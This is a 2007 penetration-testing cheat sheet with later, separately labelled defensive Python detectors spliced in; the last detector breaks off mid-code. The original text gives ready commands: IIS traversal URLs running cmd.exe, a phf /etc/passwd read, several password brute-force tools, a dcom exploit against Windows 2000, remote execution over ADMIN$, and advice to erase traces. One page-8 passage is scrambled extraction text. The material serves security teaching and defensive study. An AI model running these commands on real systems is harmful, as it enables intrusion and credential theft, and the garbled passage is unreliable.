Penetration Testing Security Audits and Assessments

http://www.netdefense.co.uk
info@netdefense.co.uk

Introduction to Penetration Testing

A Penetration Test is a method of evaluating the security of a computer system or network by simulating an attack by a hacker. The process involves an active analysis of the system for any weaknesses, technical flaws or vulnerabilities. This analysis is carried out from the position of a potential attacker, and can involve active exploitation of security vulnerabilities. Any security issues that are found will be presented to the system owner together with an assessment of their impact and often with a proposal for mitigation or a technical solution.

Black box vs. White box

Penetration tests can be conducted in several ways. The most common difference is the amount of knowledge of the implementation details of the system being tested that is available to the testers. Black box testing assumes no prior knowledge of the infrastructure to be tested, and the testers must first determine the location and extent of the systems before commencing their analysis. At the other end of the spectrum, white box testing provides the testers with complete knowledge of the infrastructure to be tested, often including network diagrams, source code and IP addressing information. There are also several variations in between, often known as gray box tests. Penetration tests may also be described as full disclosure, partial disclosure or blind tests based on the amount of information provided to the testing party.

Page 1 of 22
This material is not endorsed by, sponsored by or affiliated with any of the vendors mentioned. Cisco, Microsoft, Checkpoint, Solaris, Google and all other companies mentioned are all owners of their respective trademarks and Logos. This material is for study and education purposes only and netdefense.co.uk cannot be held responsible for any damage caused by improper use of the tools and methods described. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner. Netdefense.co.uk is not responsible for the content of external links and cannot assure that all of them work. Search for alternatives on Google in case of a broken link. © 2007 netdefense.co.uk – All rights reserved.

The 6 steps of a penetration test

1. Enumeration
Gathering as many passive facts about the target system as possible. The following are common enumeration techniques: web searches on Google, johnny.ihackstuff.com, newsgroups, NIC queries, Whois, DNS queries and SMTP probing.
Goal: Learn about the target

2. IP Scanning
The next step is to scan the target system. Methods include ICMP scanning and probing, TCP and UDP port scanning, and third-party TCP scanning. Common scan tools are NMAP, SING, hping2, lsrscan and fragroute.
Goal: Identify open services on the target

3. Assessing discovered services
Evaluate the versions of Web, FTP, Database, Mail, VPN, Telnet, SSH, DNS, SNMP, LDAP, X-Windows etc. services running on various platforms such as Microsoft or Unix through manual and automated fingerprinting.
Goal: Find out which versions of the services are in place

4. Find or write exploits
Once fingerprinting has been completed, consult the following websites to check whether exploits are available for the versions discovered: securityfocus.com, cve.mitre.org, xforce.iss.net, packetstormsecurity.org, kb.cert.org/vuls.
Goal: Find the "key" to enter the system

5. Exploit the target system
Use the exploits discovered and run them against the target in order to gain access to the target network. Erase traces on the target network that would indicate your presence.
Goal: Unauthorized access to the target system

6. Document the vulnerabilities and recommend how to close the holes
Document which exploits worked on which services and present it to the owner of the target network. Consult the websites of the services you have discovered to be vulnerable and advise upgrading to the latest versions.
Goal: Close the security holes down


Tools and Links

Most tools are available for free on the Internet.

The Best 3 sources
Back Track Security Suite – The Best freeware Hacking CD: http://www.remote-exploit.org
Around 100 of the best penetration test tools: http://www.insecure.org/tools.html
Loads of bootable Linux Live CDs with Penetration Test Tools: http://www.frozentech.com/content/livecd.php

Other sources
nmap: http://www.insecure.org/nmap/
nessus: http://www.nessus.org/
metasploit: http://metasploit.com/
immunity canvas: http://www.immunitysec.com/index.shtml
N-Stealth scanner: http://www.nstalker.com/eng/products/nstealth/
SuperScan 4.0: http://www.scanwith.com/download/SuperScan.htm
ISS internet scanner: http://www.iss.net/products_services/enterprise_protection/vulnerability_assessment/scanner_internet.php
CSS Cisco security scanner: http://www.cisco.com/univercd/cc/td/doc/product/iaabu/csscan/csscan2/csscug/overview.htm
ipscanner (linux and windows): http://www.topshareware.com/IPScanner-download-11457.htm
Tool Link List: http://examples.oreilly.com/networksa/tools/

Vulnerability Databases
Milw0rm: http://www.milw0rm.com
Security Focus: http://www.securityfocus.com
Packetstormsecurity: http://www.packetstormsecurity.org
Metasploit: http://www.metasploit.com

Enumeration

In the enumeration phase as many facts as possible are gathered about the target network.

1. Google
Looking for phone and fax numbers of companyxyz.com
Search string: +"companyxyz.com" +tel +fax
Other common search strings:
site:.companyxyz.com
allintitle: "index of /" site:.companyxyz.com
Go to http://johnny.ihackstuff.com for many more Google search strings

2. NIC Querying
Use the Samspade client (http://www.spamspade.org) and enter the IP or domain name of the target network.
Under Unix use the WHOIS utility:
whois companyxyz.com
Use: http://www.allwhois.com

3. DNS Querying
Use the nslookup tool:
nslookup
set type=any
companyxyz.com

Use the host command (Unix):
host companyxyz.com
Use the dig command:
dig companyxyz.com any
Try a DNS zone transfer (if successful, the whole target network DNS IP-to-name mapping will be revealed):
nslookup
set type=any
companyxyz.com
server companyxyz.com (whichever the DNS authority for this domain is)
ls -d companyxyz.com
or
ls -d companyxyz.com >> /tmp/zone_out (to write the output into a file)

4. SMTP Probing
Send an email to a known wrong address of the target network such as blahblah@companyxyz.com. Wait for the failure mail coming back from their server. It will contain valuable information about the mail setup.

5. PING and TRACEROUTE
PING uses ICMP packets (per default Echo Request and Echo Reply). If a reply is received, the host is active.
ping www.companyxyz.com
or
ping 192.168.1.1
Traceroute shows the path any packet takes from your machine to the target host:
traceroute www.companyxyz.com
or
traceroute 192.168.1.1 (the command is tracert on Windows)

IP Scanning

In the IP Scanning phase, active hosts on the target network are scanned for activity (ie ICMP) and for all open TCP and UDP services.

NMAP
Download the NMAP tool (either UNIX or Windows based) from http://insecure.org/nmap/
Use the NMAP tool to perform a PING SWEEP (ICMP pings to all hosts in a subnet to see which ones respond):
nmap -sP -PI 192.168.1.0/24
Next we identify the subnet broadcast addresses:
nmap -sP 192.168.1.0/24

TCP Port Scanning types
Vanilla Scan (no stealth, active connect scan)
TCP Half-Open SYN Scan (only SYN packet sent)
XMAS Scan (all flags are set)
Null Scan (no flags are set)

TCP Port Scanning Response Codes
SYN SEND – SYN/ACK RECEIVED -> PORT OPEN
SYN SEND – RST/ACK RECEIVED -> PORT CLOSED OR FIREWALLED
SYN SEND – ICMP TYPE 3 CODE 13 RECEIVED -> ADMIN PROHIBITED
SYN SEND – NOTHING RETURNED -> SILENTLY DROPPED
FIN/URG/PSH/NULL SEND – NO RESPONSE -> PORT OPEN
FIN/URG/PSH/NULL SEND – RST/ACK -> PORT CLOSED

UDP Port Scanning Response Codes
NO RESPONSE TO UDP PROBE -> OPEN
ICMP TYPE 3 CODE 13 RECEIVED -> CLOSED
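The response-code tables above describe what the scanner sees. On the defending side the same probes show up in the firewall log as one source touching many ports in a short time, with the flag combination telling you which scan type was used. The following is an added example, not part of the netdefense.co.uk cheat sheet: it parses constructed iptables-style kernel log lines (the format, hosts and the five-ports-per-minute threshold are assumptions for the example), maps each packet's TCP flags to the scan types named above (SYN, FIN, Null, XMAS), treats UDP probes as their own type, and reports every source that hit five or more distinct destination ports within one minute.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed iptables-style log lines (not taken from any real firewall). Syslog
# timestamps carry no year, so parse_line() pins one.
SAMPLE_LOG = """\
Mar  3 10:00:01 fw kernel: IN=eth0 OUT= SRC=192.168.1.50 DST=192.168.1.10 PROTO=TCP SPT=40001 DPT=21 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  3 10:00:01 fw kernel: IN=eth0 OUT= SRC=192.168.1.50 DST=192.168.1.10 PROTO=TCP SPT=40002 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  3 10:00:02 fw kernel: IN=eth0 OUT= SRC=192.168.1.50 DST=192.168.1.10 PROTO=TCP SPT=40003 DPT=25 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  3 10:00:02 fw kernel: IN=eth0 OUT= SRC=192.168.1.50 DST=192.168.1.10 PROTO=TCP SPT=40004 DPT=80 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  3 10:00:03 fw kernel: IN=eth0 OUT= SRC=192.168.1.50 DST=192.168.1.10 PROTO=TCP SPT=40005 DPT=110 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  3 10:00:03 fw kernel: IN=eth0 OUT= SRC=192.168.1.50 DST=192.168.1.10 PROTO=TCP SPT=40006 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  3 10:00:04 fw kernel: IN=eth0 OUT= SRC=192.168.1.50 DST=192.168.1.10 PROTO=TCP SPT=40007 DPT=443 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  3 10:00:04 fw kernel: IN=eth0 OUT= SRC=192.168.1.50 DST=192.168.1.10 PROTO=UDP SPT=40010 DPT=161 LEN=48
Mar  3 10:05:00 fw kernel: IN=eth0 OUT= SRC=192.168.1.77 DST=192.168.1.10 PROTO=TCP SPT=40100 DPT=21 WINDOW=1024 RES=0x00 URGP=0
Mar  3 10:05:00 fw kernel: IN=eth0 OUT= SRC=192.168.1.77 DST=192.168.1.10 PROTO=TCP SPT=40101 DPT=22 WINDOW=1024 RES=0x00 URGP=0
Mar  3 10:05:01 fw kernel: IN=eth0 OUT= SRC=192.168.1.77 DST=192.168.1.10 PROTO=TCP SPT=40102 DPT=23 WINDOW=1024 RES=0x00 URGP=0
Mar  3 10:05:01 fw kernel: IN=eth0 OUT= SRC=192.168.1.77 DST=192.168.1.10 PROTO=TCP SPT=40103 DPT=25 WINDOW=1024 RES=0x00 URGP=0
Mar  3 10:05:02 fw kernel: IN=eth0 OUT= SRC=192.168.1.77 DST=192.168.1.10 PROTO=TCP SPT=40104 DPT=80 WINDOW=1024 RES=0x00 URGP=0
Mar  3 10:10:00 fw kernel: IN=eth0 OUT= SRC=192.168.1.20 DST=192.168.1.10 PROTO=TCP SPT=51000 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0
Mar  3 10:10:00 fw kernel: IN=eth0 OUT= SRC=192.168.1.20 DST=192.168.1.10 PROTO=TCP SPT=51000 DPT=80 WINDOW=5840 RES=0x00 ACK URGP=0
Mar  3 10:10:01 fw kernel: IN=eth0 OUT= SRC=192.168.1.20 DST=192.168.1.10 PROTO=TCP SPT=51001 DPT=443 WINDOW=5840 RES=0x00 SYN URGP=0
Mar  3 10:10:02 fw sshd[1234]: Accepted publickey for ops from 192.168.1.20 port 51002
"""

TCP_FLAGS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}
LINE_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ kernel: (.*)$")


def parse_line(line, year=2007):
    """Return a dict for an iptables packet log line, or None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    fields = dict(re.findall(r"(\w+)=(\S*)", m.group(2)))
    if "SRC" not in fields or "PROTO" not in fields:
        return None
    return {
        "ts": ts,
        "src": fields["SRC"],
        "proto": fields["PROTO"],
        "dpt": int(fields["DPT"]) if "DPT" in fields else None,
        # bare words such as SYN or ACK are the TCP flags iptables logs for the packet
        "flags": {tok for tok in m.group(2).split() if tok in TCP_FLAGS},
    }


def classify_probe(flags):
    """Map a TCP flag set to the scan type from the table above; None for ordinary traffic."""
    if flags == {"SYN"}:
        return "syn"
    if not flags:
        return "null"
    if flags == {"FIN"}:
        return "fin"
    if flags == {"FIN", "PSH", "URG"}:
        return "xmas"
    return None  # SYN/ACK, ACK, RST etc. belong to established or rejected connections


def detect_scans(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {src: {"ports": n, "types": [...]}} for sources probing >= threshold
    distinct destination ports within one sliding window."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        e = parse_line(line)
        if not e or e["dpt"] is None:
            continue
        kind = classify_probe(e["flags"]) if e["proto"] == "TCP" else "udp"
        if kind:
            by_src[e["src"]].append((e["ts"], e["dpt"], kind))
    findings = {}
    for src, probes in by_src.items():
        probes.sort()
        for i in range(len(probes)):
            start = probes[i][0]
            in_win = [p for p in probes[i:] if p[0] - start <= window]
            ports = {p[1] for p in in_win}
            if len(ports) >= threshold:
                findings[src] = {"ports": len(ports), "types": sorted({p[2] for p in in_win})}
                break
    return findings


if __name__ == "__main__":
    for src, info in detect_scans(SAMPLE_LOG).items():
        print(f"{src}: {info['ports']} ports, scan types {info['types']}")
```

With the sample, 192.168.1.50 is reported as a SYN plus UDP scan across 8 ports and 192.168.1.77 as a Null scan, while 192.168.1.20's two ordinary connections stay below the threshold. The window approach is deliberately simple: a scan spread over hours, or spread across many source addresses, would not cross the threshold, which is why production detection also keys on the RST/ACK and ICMP type 3 replies the target sends back.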

Common NMAP options
-sF (FIN FLAG)
-sN (NULL FLAG)
-sX (ALL XMAS FLAGS SET)
-sI (IP ID header scan)
-sS (SYN Stealth)
-sU (UDP Scan)
-p (Port to scan)

Assessment of either the common (shorter scan) or all TCP and UDP services on the target network or host.

NMAP Scan
Common TCP services:
nmap -sS -P0 -p21,25,53,80,110 -oG output.txt 192.168.10.0/24
Common UDP services:
nmap -sU -P0 -p53,69,123,137,161 -oG output.txt 192.168.10.0/24
FULL TCP SCAN:
nmap -sS -P0 -p1-65535 -v -A -o output.txt 192.168.10.0/24
FULL UDP SCAN:
nmap -sU -P0 -p1-65535 -o output.txt 192.168.10.0/24

Guessing the Operating System of the target network with NMAP:
nmap -O -sS 192.168.1.1
NMAP will try to reveal the Operating System.

HPING2
hping2 -c 3 -s 53 -p 139 -S 192.168.1.1
-c = number of probe packets
-s = source tcp port
-p = dest port
-S = set TCP SYN FLAG
-F = set TCP FIN FLAG
-A = set TCP ACK FLAG

LSRSCAN
Check for source routing vulnerabilities with "lsrscan":
lsrscan 192.168.1.1
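The -oG option in the scans above writes nmap's grepable output, one "Host:" line per host with a "Ports:" field of port/state/protocol/owner/service/rpc/version entries. As an added example (not the cheat sheet's own material), this parses that format into a per-host inventory and compares the open ports against an allowed-services baseline, which is how an auditor turns a scan file into a list of services that should not be reachable. The scan output and baseline below are constructed, not captured from a real network.

```python
import re

# Constructed nmap -oG output (not from a real scan); tabs separate the fields.
SAMPLE_OG = """\
# Nmap 4.20 scan initiated Sat Mar  3 10:00:00 2007 as: nmap -sS -sU -P0 -oG output.txt 192.168.10.0/24
Host: 192.168.10.1 ()\tStatus: Up
Host: 192.168.10.1 ()\tPorts: 53/open/tcp//domain///, 80/closed/tcp//http///\tIgnored State: closed (3)
Host: 192.168.10.5 ()\tStatus: Up
Host: 192.168.10.5 ()\tPorts: 21/open/tcp//ftp///, 25/filtered/tcp//smtp///, 80/open/tcp//http///, 161/open/udp//snmp///
# Nmap done at Sat Mar  3 10:00:42 2007 -- 256 IP addresses (2 hosts up) scanned in 42.1 seconds
"""

# Constructed baseline of services each host is allowed to expose: {host: {(port, proto)}}.
# Hosts missing from the baseline are allowed nothing.
BASELINE = {
    "192.168.10.1": {(53, "tcp")},
    "192.168.10.5": {(21, "tcp"), (80, "tcp")},
}


def parse_grepable(text):
    """Return {host: {(port, proto): (state, service)}} from nmap -oG output."""
    inventory = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        host = line.split()[1]
        inventory.setdefault(host, {})
        m = re.search(r"Ports: (.*?)(?:\t|$)", line)
        if not m:
            continue  # "Status: Up" lines carry no port list
        for entry in m.group(1).split(", "):
            parts = entry.split("/")  # port/state/proto/owner/service/rpc/version/
            port, state, proto, service = int(parts[0]), parts[1], parts[2], parts[4]
            inventory[host][(port, proto)] = (state, service)
    return inventory


def open_services(inventory):
    """Reduce the inventory to the sorted list of (port, proto) that are open, per host."""
    return {
        host: sorted(pp for pp, (state, _) in ports.items() if state == "open")
        for host, ports in inventory.items()
    }


def diff_against_baseline(inventory, baseline):
    """Return {host: [(port, proto), ...]} of open services the baseline does not allow."""
    unexpected = {}
    for host, ports in open_services(inventory).items():
        allowed = baseline.get(host, set())
        extra = [pp for pp in ports if pp not in allowed]
        if extra:
            unexpected[host] = extra
    return unexpected


if __name__ == "__main__":
    inv = parse_grepable(SAMPLE_OG)
    for host, extra in diff_against_baseline(inv, BASELINE).items():
        print(host, "unexpected open services:", extra)
```

Filtered ports are kept in the inventory but not counted as open, so a firewalled SMTP port does not show up as a finding; in the sample only the SNMP listener on 192.168.10.5 is reported.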

168. . It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.1 79 or finger @192.1.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.uk Remote Information Services RIS are common on the majority of all systems.1. It has many flaws and many users leave the default community strings in place. Checkpoint.co. Netdefense.uk – All rights reserved.10 15 DNS A DNS zone file contains all name to IP mappings for a specific network/zone.com companyxyz.1 SNMP Simple Network Management Protocol runs on most systems on UDP port 161.co.co.com) can be shown.1. If this file can be obtained.companyxyz.co. This material is for study and education purposes only and netdefense.uk info@netdefense.uk is not responsible for the content of external links and cannot assure that all of them work. Search for alternatives on Google in case of a broken link.168.1.companyxyz. Solaris. Unix Systat and Netstat These services contain valuable information about network and system processes. Google and all other companies mentioned are all owners of their respective trademarks and Logos. Cisco. all mappings for example (192.co.168.1. Page 8 of 22 This material is not endorsed by. © 2007 netdefense.netdefense.Penetration Testing Security Audits and Assessments http://www. Microsoft. Check Systat and Netstat: A telnet to port 11 (Systat) telnet 192.1.com axfr Finger The Finger Service is an information service enabled per default on many platforms on TCP port 79 To check whether it is enabled: telnet 192.1 = mail.10 11 A telnet to port 15 (Netstat) telnet 192.168. sponsored by or affiliated with any of the vendors mentioned. Find the DNS server which is the authority for a zone via nslookup (see DNS enumeration) Attempt a DNS zone transfer with the “dig” tool dig @nameserver.

Tools to check SNMP:
ADMsnmp 192.168.1.1 (ADMsnmp tool)
snmpwalk -c private 192.168.1.1
snmpwalk -c public 192.168.1.1
Gather usernames on WIN NT & 2000 where SNMP is enabled:
snmpwalk -c public 192.168.1.1 .1.3.6.1.4.1.77.1.2.25
Upload a config through SNMP:
The tool "snmpset" can be used to upload a config through SNMP, to a router for example.

LDAP
LDAP on Windows 2000 Active Directory often has vulnerabilities which can reveal crucial data.
Unix tool ldapsearch:
ldapsearch -h 192.168.1.1

RWHO
This service runs on Unix machines on UDP port 513 and exploiting it can reveal all users currently logged into the remote target system:
rwho 192.168.1.1
The tool "rusers" can perform the same:
rusers -l 192.168.1.1

Exploits
Once you have obtained the server's version, search for exploits in vulnerability databases (see Tools & Links section).

Web Servers

Webservers are usually either UNIX based (ie Apache) or Microsoft based (IIS) and, due to their nature of providing a public service, they exist in large numbers and always have vulnerabilities.

Fingerprinting a webserver
telnet www.companyxyz.com 80
followed by:
HEAD / HTTP/1.0
and twice the enter key.

Reveal HTTP Options
telnet www.companyxyz.com 80
followed by:
OPTIONS / HTTP/1.0
and twice the enter key.

Automated Web Server Assessment Tools
Nikto (Unix based):
perl nikto.pl -host www.companyxyz.com
N-Stealth (Windows based): www.nstalker.com/nstealth/

Paths
Poorly protected information can usually be found in the following paths:
/backup
/private
/test
Microsoft Outlook Web Access: check for /owa /exchange /mail
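The HEAD and OPTIONS requests above return a status line and headers; what matters to the assessor is the Server banner (does it disclose a version?) and the Allow list (are methods such as TRACE or PUT enabled?). The following is an added example, not from the cheat sheet: it parses the response head and reports those two things, run over constructed responses for a server that discloses its version and allows TRACE and for the same server after hardening. The responses, and the Apache directives named in the comment, are the example's own assumptions, not something the original page states.

```python
import re

# Constructed responses (not captured from any real server) to the HEAD and OPTIONS
# requests shown above; a real check would read these from the socket.
HEAD_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Sat, 03 Mar 2007 10:00:00 GMT\r\n"
    b"Server: Apache/1.3.37 (Unix) PHP/4.4.4 mod_ssl/2.8.28 OpenSSL/0.9.7d\r\n"
    b"Content-Type: text/html\r\n\r\n"
)
OPTIONS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/1.3.37 (Unix)\r\n"
    b"Allow: GET, HEAD, POST, OPTIONS, TRACE\r\n"
    b"Content-Length: 0\r\n\r\n"
)
# The same server after "ServerTokens Prod" and "TraceEnable off" in httpd.conf.
HARDENED_HEAD = b"HTTP/1.1 200 OK\r\nServer: Apache\r\nContent-Type: text/html\r\n\r\n"
HARDENED_OPTIONS = b"HTTP/1.1 200 OK\r\nServer: Apache\r\nAllow: GET, HEAD, POST, OPTIONS\r\n\r\n"

# Methods whose presence in the Allow list deserves a finding.
RISKY_METHODS = {"TRACE", "PUT", "DELETE", "CONNECT", "PROPFIND", "MKCOL"}


def parse_response_head(raw):
    """Return (status_code, {header_name_lower: value}) for the head of an HTTP response."""
    if isinstance(raw, bytes):
        raw = raw.decode("latin-1")
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def _method_list(value):
    return {m.strip().upper() for m in value.split(",") if m.strip()}


def assess(head_response, options_response):
    """Summarise banner disclosure and enabled methods from the two responses."""
    _, head_headers = parse_response_head(head_response)
    _, options_headers = parse_response_head(options_response)
    server = head_headers.get("server", "")
    allowed = _method_list(options_headers.get("allow", ""))
    # Older IIS answers OPTIONS with a non-standard "Public:" header instead of Allow.
    allowed |= _method_list(options_headers.get("public", ""))
    return {
        "server": server,
        "version_disclosed": bool(re.search(r"/\d", server)),
        "allowed_methods": sorted(allowed),
        "risky_methods": sorted(allowed & RISKY_METHODS),
    }


if __name__ == "__main__":
    print(assess(HEAD_RESPONSE, OPTIONS_RESPONSE))
    print(assess(HARDENED_HEAD, HARDENED_OPTIONS))
```

The version check is a simple "slash followed by a digit" test on the Server header, which catches Apache, PHP and OpenSSL style tokens alike; a banner that has been changed to a bare product name passes it.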

IIS Unicode Exploits
Add to the URL path:
www.example.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
www.example.com/../../../../
www.example.com/cgi-bin/phf?Qalias+x%0a/bin/cat%20/etc/passwd

HTML source code
Check the source code by right-clicking the mouse when over a website. Look for: CGI form passwords.

Exploits
Once you have obtained the server's version, search for exploits in vulnerability databases (see Tools & Links section).

Remote Access Services

These services are used to remotely manage and maintain server and networking components.

SSH (Secure Shell) Fingerprinting
telnet 192.168.1.1 22
This will reveal the SSH implementation and version.

Telnet Fingerprinting
telnet 192.168.1.1

Against both telnet and SSH a brute-force attack can be launched (trying different username and password pair combinations). Brutus is the default tool: http://www.hoobie.net/brutus/

X-Windows
Used in many networks in order to export a display to a remote host.
Fingerprinting X-Servers with the tool "xscan":
./xscan 192.168.1.1
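The first IIS URL at the top of this page works because "%255c" is a double-encoded backslash: one decode gives "%5c", a second gives "\", and a filter that decodes only once never sees the ".." segment. As an added example (not part of the cheat sheet), this shows the detection side: a path canonicaliser that decodes until the string stops changing and then checks for a ".." segment, run against constructed web server access-log lines. The naive single-decode check is kept alongside it to show exactly which request it misses. The log lines and client addresses are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed Common Log Format lines (not from a real server).
SAMPLE_ACCESS_LOG = [
    '192.168.1.50 - - [03/Mar/2007:10:00:01 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1234',
    '192.168.1.50 - - [03/Mar/2007:10:00:02 +0000] "GET /../../../../etc/passwd HTTP/1.0" 404 210',
    '192.168.1.20 - - [03/Mar/2007:10:00:03 +0000] "GET /index.html HTTP/1.0" 200 4321',
    '192.168.1.20 - - [03/Mar/2007:10:00:04 +0000] "GET /docs/a..b/readme.txt HTTP/1.0" 200 120',
]

CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def canonical_path(raw_path, max_rounds=3):
    """Percent-decode until the result stops changing (so %255c -> %5c -> \\),
    then fold backslashes into forward slashes. max_rounds bounds pathological input."""
    decoded = raw_path
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.replace("\\", "/")


def naive_is_traversal(raw_path):
    """A single decode, as a filter that does not expect double encoding would do."""
    return ".." in unquote(raw_path).split("/")


def is_traversal(raw_path):
    """True if the canonical form of the path contains a '..' segment."""
    return ".." in canonical_path(raw_path).split("/")


def flag_requests(log_lines):
    """Return (client, raw_path) for every log line whose request path is a traversal attempt."""
    hits = []
    for line in log_lines:
        m = CLF_RE.match(line)
        if m and is_traversal(m.group(3)):
            hits.append((m.group(1), m.group(3)))
    return hits


if __name__ == "__main__":
    for client, path in flag_requests(SAMPLE_ACCESS_LOG):
        print(f"{client} traversal attempt: {path}")
```

Note the limit of this check: it handles percent-encoding layers, but the overlong UTF-8 forms the original IIS Unicode bug relied on (for example %c0%af for "/") are decoded as replacement characters by unquote, so those must be rejected at the URL decoder itself rather than by a pattern match afterwards.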

Microsoft Desktop Protocol
Remote Desktop Protocol provides remote access to Windows desktops. Runs on TCP port 3389.
Using "tsgrinder" to brute-force into a machine:
tsgrinder -w words -l leet -d workgroup -u administrator -b -n 2 192.168.1.1

VNC
Virtual Network Computing is a simple network management tool for remote desktops and can easily be exploited.
Using "vncrack", a Unix based tool:
./vncrack -h 192.168.1.1 -w common.txt (where common.txt is a dictionary file)
Using "x4", a Windows based tool: get it from http://ww.phenoelit.de

Citrix
Citrix is a thin client Windows service that is accessed through port 1494 TCP on the server side.
The Unix tool "citrix-pa-scan" can reveal published applications:
./citrix-pa-scan 192.168.1.1

Exploits
Once you have obtained the server's version, search for exploits in vulnerability databases (see Tools & Links section).

FTP Servers and Databases

FTP Servers
FTP servers are file sharing devices and very common in modern networks.
Checking for the FTP server version:
ftp 192.168.1.1
Check for anonymous login:
User: anonymous
Password: something@something.com
If login is successful, issue the "ls" and "HELP" commands.
Gather valid usernames:
telnet 192.168.1.1 21
CWD ~blah
CWD ~test
CWD ~admin
until code 530 shows up: Please login with USER and PASS
Then exploit:
ftp 192.168.1.1
USER: admin
PASS: blah
CWD ~
ls -ls /core
strings /core | grep ::

Microsoft SQL Servers
MS SQL servers are SQL databases used to store large amounts of user data.
Assess MS SQL servers with "sqlping":
sqlping 192.168.1.1
MS SQL brute-force attack with "sqlbf":
sqlbf (follow the options and specify a username and password list)

Oracle Databases
Oracle databases are the most popular commercial databases in today's markets and widespread. The TNS listener is the component through which clients connect into the database. Check the TNS listener with the "tnscmd" tool (Unix):
perl tnscmd.pl -h 192.168.1.1

MySQL General Assessment
The MySQL service runs on port 3306. A telnet to that port reveals more details about the version in use:
telnet 192.168.1.1 3306

Exploits
Once you have obtained the server's version, search for exploits in vulnerability databases (see Tools & Links section).

Windows Penetration

Microsoft Windows products are popular throughout today's networks due to their user friendliness.

Windows Enumeration
A variety of enumeration tools are available for MS Windows operating systems.
The "epdump" tool queries the RPC endpoint mapper running on port 135 TCP:
epdump 192.168.1.1
"rpcdump" is an advanced tool to enumerate RPC service information:
rpcdump 192.168.1.1
or
rpcdump -v 192.168.1.1 (more detailed information)
The "RpcScan" (www.securityfriday) tool is a graphical version of the rpcdump tool.
The "Walksam" tool queries the SAMR interface in order to reveal user information:
walksam 192.168.1.1

Brute-Forcing Administrator passwords
Many Windows machines can be accessed through the default Administrator account: "Administrator"
Hint: Try "Administrator" with a blank password initially.
The tool "WMICracker" can be used to launch a brute-force attack with dictionary files:
WMICracker 192.168.1.1 Administrator words.txt
Gaining access may also be possible through vulnerabilities in the RPC services (DCOM, Messenger Service and Workstation service). The tool "dcom" can be used:

./dcom
Views the options.
Example attack on Windows 2000 SP4 English (option 5):
./dcom 5 192.168.1.1
An advanced tool to collect more valuable information about a Windows target is "winfo":
winfo 192.168.1.1

NetBIOS Name Service
The NetBIOS name service is accessible through UDP port 137. The tool "nbtstat" can be used to enumerate the NetBIOS name table:
nbtstat -A 192.168.1.1
Sensitive information can also be gathered through creating a "null session" on TCP port 139:
net use \\target\IPC$ "" /user:""
The tool "enum" can be used to enumerate the NetBIOS session service:
enum -UGP 192.168.1.1

Authentication with NetBIOS
Once a valid user account password has been obtained, NetBIOS can be used to authenticate:
net use \\target\IPC$ password /user:username
for example:
net use \\192.168.1.1\ADMIN$ secret /user:administrator
Afterwards you can execute programs:
at \\192.168.1.1 05:30 c:\temp\anything.exe

CIFS Service
The CIFS service (Common Internet File System) runs on both UDP and TCP port 445 and enables SMB access. For CIFS enumeration use the tool "smbdumpusers":
C:\smbdumpusers -i 192.168.1.1 -m -2 -P1
The CIFS brute-force tool "smbbf" is used for dictionary attacks using a user list and a password list:
smbbf -i 192.168.1.1 -p common.txt -u users.txt -v -P1

Exploits
Once you have obtained the server's version, search for exploits in vulnerability databases (see Tools & Links section).

Mail Servers

Mail servers use the common well-known ports:
smtp – 25/tcp
pop2 – 109/tcp
pop3 – 110/tcp
imap2 – 143/tcp
ssmtp – 465/tcp
imaps – 993/tcp
pop3s – 995/tcp

SMTP
To fingerprint SMTP services, use the tools "smtpmap" and "smtpscan":
smtpmap mail.companyxyz.com
smtpscan mail.companyxyz.com
To check whether SPAM mail can be relayed:
telnet mail.companyxyz.com 25
HELO world (or the FQDN of the mail server)
HELP (might give help commands)
EXPN root (reveals whether the email account "root" exists)
VRFY accounting (reveals whether accounting@companyxyz.com is valid)
then
MAIL FROM: test@test.com
RCPT TO: anything@anything.com
DATA
Subject: Test
your text
.
quit
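The relay test above is judged by the server's reply codes: a 250 to RCPT TO for a foreign recipient, after a MAIL FROM at a foreign domain, means the server relays; 250 to VRFY or EXPN means it confirms account names, whereas 252 ("cannot verify") is a deliberate non-answer. The following is an added example, not part of the cheat sheet, that evaluates a saved transcript of such a session (client lines prefixed "C: ", server lines "S: ", a convention of this example) and returns those three findings. The two transcripts are constructed: one for an open relay, one for the same server after VRFY/EXPN and relaying have been turned off.

```python
import re

# Constructed session transcripts (not captured from a real server).
OPEN_RELAY_SESSION = """\
S: 220 mail.companyxyz.com ESMTP
C: HELO world
S: 250 mail.companyxyz.com
C: VRFY accounting
S: 250 accounting <accounting@companyxyz.com>
C: EXPN root
S: 252 Cannot EXPN user
C: MAIL FROM: test@test.com
S: 250 OK
C: RCPT TO: anything@anything.com
S: 250 OK
C: QUIT
S: 221 Bye
"""

HARDENED_SESSION = """\
S: 220 mail.companyxyz.com ESMTP
C: HELO world
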